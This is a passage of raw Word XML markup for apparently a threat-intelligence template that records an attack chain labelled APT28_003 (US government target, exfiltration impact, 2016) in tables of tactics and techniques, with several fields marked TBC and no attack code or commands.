                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>United States</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76431CDB" w14:textId="776847E1" w:rsidR="00C55455" w:rsidRPr="00387DCC" w:rsidRDefault="00C55455" w:rsidP="00C55455">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55455" w:rsidRPr="00B857D7" w14:paraId="4F3BD2AB" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1300EA47" w14:textId="207BAADA" w:rsidR="00C55455" w:rsidRDefault="00C55455" w:rsidP="00C55455">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Target Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="252869FB" w14:textId="5CD699A2" w:rsidR="00C55455" w:rsidRDefault="00C55455" w:rsidP="00C55455">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Government</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A7680E7" w14:textId="78802ECF" w:rsidR="00C55455" w:rsidRPr="00387DCC" w:rsidRDefault="00C55455" w:rsidP="00C55455">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55455" w:rsidRPr="00B857D7" w14:paraId="2938326E" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="450DBF2A" w14:textId="1344323D" w:rsidR="00C55455" w:rsidRDefault="00C55455" w:rsidP="00C55455">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B6B8E51" w14:textId="76CFC341" w:rsidR="00C55455" w:rsidRDefault="00C55455" w:rsidP="00C55455">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="283F8E06" w14:textId="77777777" w:rsidR="00C55455" w:rsidRDefault="00C55455" w:rsidP="00C55455">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55455" w:rsidRPr="00B857D7" w14:paraId="60A4AF52" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BF36CEA" w14:textId="7C37C039" w:rsidR="00C55455" w:rsidRDefault="00C55455" w:rsidP="00C55455">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Vulnerabilities Exploited</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74A64DBB" w14:textId="01D645BE" w:rsidR="00C55455" w:rsidRDefault="00C55455" w:rsidP="00C55455">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B010189" w14:textId="3445981B" w:rsidR="00C55455" w:rsidRDefault="00C55455" w:rsidP="00C55455">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55455" w:rsidRPr="00B857D7" w14:paraId="48D910C8" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28E6D2BA" w14:textId="42BC422A" w:rsidR="00C55455" w:rsidRDefault="00C55455" w:rsidP="00C55455">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Related Attack Patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A2EFFAA" w14:textId="77777777" w:rsidR="00C55455" w:rsidRDefault="00C55455" w:rsidP="00C55455">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3812EB49" w14:textId="66667246" w:rsidR="00C55455" w:rsidRDefault="00C55455" w:rsidP="00C55455">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00947A0B" w:rsidRPr="00B857D7" w14:paraId="68E38E13" w14:textId="77777777" w:rsidTr="0016701B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F8A346B" w14:textId="77777777" w:rsidR="00947A0B" w:rsidRDefault="00947A0B" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Preceded By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4409B76D" w14:textId="77777777" w:rsidR="00947A0B" w:rsidRDefault="00947A0B" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>TBC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43CEA02C"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72431061" w14:textId="77777777" w:rsidTr="0016701B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CCE63C9" w14:textId="77777777" w:rsidR="00947A0B" w:rsidRDefault="00947A0B" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Schema Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14D72403" w14:textId="77777777" w:rsidR="00947A0B" w:rsidRDefault="00947A0B" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C8D42A9" w14:textId="77777777" w:rsidR="00947A0B" w:rsidRDefault="00947A0B" w:rsidP="0016701B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>To allow for future new chain models</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55455" w:rsidRPr="00B857D7" w14:paraId="74AF25C6" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A65AA83" w14:textId="02096F3D" w:rsidR="00C55455" w:rsidRDefault="00C55455" w:rsidP="00C55455">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="394B45F9" w14:textId="0097D296" w:rsidR="00C55455" w:rsidRDefault="00C55455" w:rsidP="00C55455">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r w:rsidR="00A83395">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17C827E4" w14:textId="77777777" w:rsidR="00C55455" w:rsidRDefault="00C55455" w:rsidP="00C55455">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FB171C" w:rsidRPr="00B857D7" w14:paraId="2408AD40" w14:textId="77777777" w:rsidTr="00947A0B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E4915DC" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3119" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54D89FB8" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="157426FE" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7BEB34F5" w14:textId="77777777" w:rsidR="00FB171C" w:rsidRPr="00AC7A85" w:rsidRDefault="00FB171C" w:rsidP="00FB171C"/>
    <w:p w14:paraId="095B8A80" w14:textId="4069486F" w:rsidR="00FB171C" w:rsidRDefault="00FB171C" w:rsidP="00FB171C">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408"/>
        <w:gridCol w:w="661"/>
        <w:gridCol w:w="699"/>
        <w:gridCol w:w="557"/>
        <w:gridCol w:w="992"/>
        <w:gridCol w:w="2126"/>
      </w:tblGrid>
      <w:tr w:rsidR="00285F73" w:rsidRPr="002D1D50" w14:paraId="04C937E9" w14:textId="77777777" w:rsidTr="008D2933">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="1EA89CDA" w14:textId="77777777" w:rsidR="00285F73" w:rsidRDefault="00285F73" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="459615FC" w14:textId="77777777" w:rsidR="00285F73" w:rsidRPr="002D1D50" w:rsidRDefault="00285F73" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Chain_ID</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="29D646A1" w14:textId="22188546" w:rsidR="00285F73" w:rsidRPr="002D1D50" w:rsidRDefault="00285F73" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>APT28_003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="1C605F6A" w14:textId="77777777" w:rsidR="00285F73" w:rsidRPr="002D1D50" w:rsidRDefault="00285F73" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="38391F94" w14:textId="77777777" w:rsidR="00285F73" w:rsidRPr="002D1D50" w:rsidRDefault="00285F73" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Ver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="027D41D8" w14:textId="77777777" w:rsidR="00285F73" w:rsidRPr="002D1D50" w:rsidRDefault="00285F73" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="1A539D1D" w14:textId="77777777" w:rsidR="00285F73" w:rsidRPr="002D1D50" w:rsidRDefault="00285F73" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="14BF2A5F" w14:textId="77777777" w:rsidR="00285F73" w:rsidRPr="002D1D50" w:rsidRDefault="00285F73" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00285F73" w:rsidRPr="002D1D50" w14:paraId="06C95EFA" w14:textId="77777777" w:rsidTr="008D2933">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36729E5E" w14:textId="77777777" w:rsidR="00285F73" w:rsidRPr="002D1D50" w:rsidRDefault="00285F73" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="663242E1" w14:textId="77777777" w:rsidR="00285F73" w:rsidRPr="002D1D50" w:rsidRDefault="00285F73" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="313C9D90" w14:textId="77777777" w:rsidR="00285F73" w:rsidRPr="002D1D50" w:rsidRDefault="00285F73" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D755F65" w14:textId="77777777" w:rsidR="00285F73" w:rsidRPr="002D1D50" w:rsidRDefault="00285F73" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1AD9ADD7" w14:textId="77777777" w:rsidR="00285F73" w:rsidRPr="002D1D50" w:rsidRDefault="00285F73" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BEEC63B" w14:textId="77777777" w:rsidR="00285F73" w:rsidRPr="002D1D50" w:rsidRDefault="00285F73" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="023796F6" w14:textId="77777777" w:rsidR="00285F73" w:rsidRPr="002D1D50" w:rsidRDefault="00285F73" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29A70075" w14:textId="77777777" w:rsidR="00285F73" w:rsidRPr="002D1D50" w:rsidRDefault="00285F73" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00285F73" w:rsidRPr="002D1D50" w14:paraId="0978FC58" w14:textId="77777777" w:rsidTr="008D2933">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="764D5876" w14:textId="77777777" w:rsidR="00285F73" w:rsidRPr="002D1D50" w:rsidRDefault="00285F73" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10479730" w14:textId="77777777" w:rsidR="00285F73" w:rsidRPr="002D1D50" w:rsidRDefault="00285F73" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="257FCAB4" w14:textId="77777777" w:rsidR="00285F73" w:rsidRPr="002D1D50" w:rsidRDefault="00285F73" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3290330F" w14:textId="77777777" w:rsidR="00285F73" w:rsidRPr="002D1D50" w:rsidRDefault="00285F73" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Pred</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61038DDB" w14:textId="77777777" w:rsidR="00285F73" w:rsidRPr="002D1D50" w:rsidRDefault="00285F73" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>TInc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6065E85E" w14:textId="77777777" w:rsidR="00285F73" w:rsidRDefault="00285F73" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>S/G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="992" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="409047DF" w14:textId="77777777" w:rsidR="00285F73" w:rsidRPr="002D1D50" w:rsidRDefault="00285F73" w:rsidP="008D2933">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>KC</w:t>
            </w:r>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
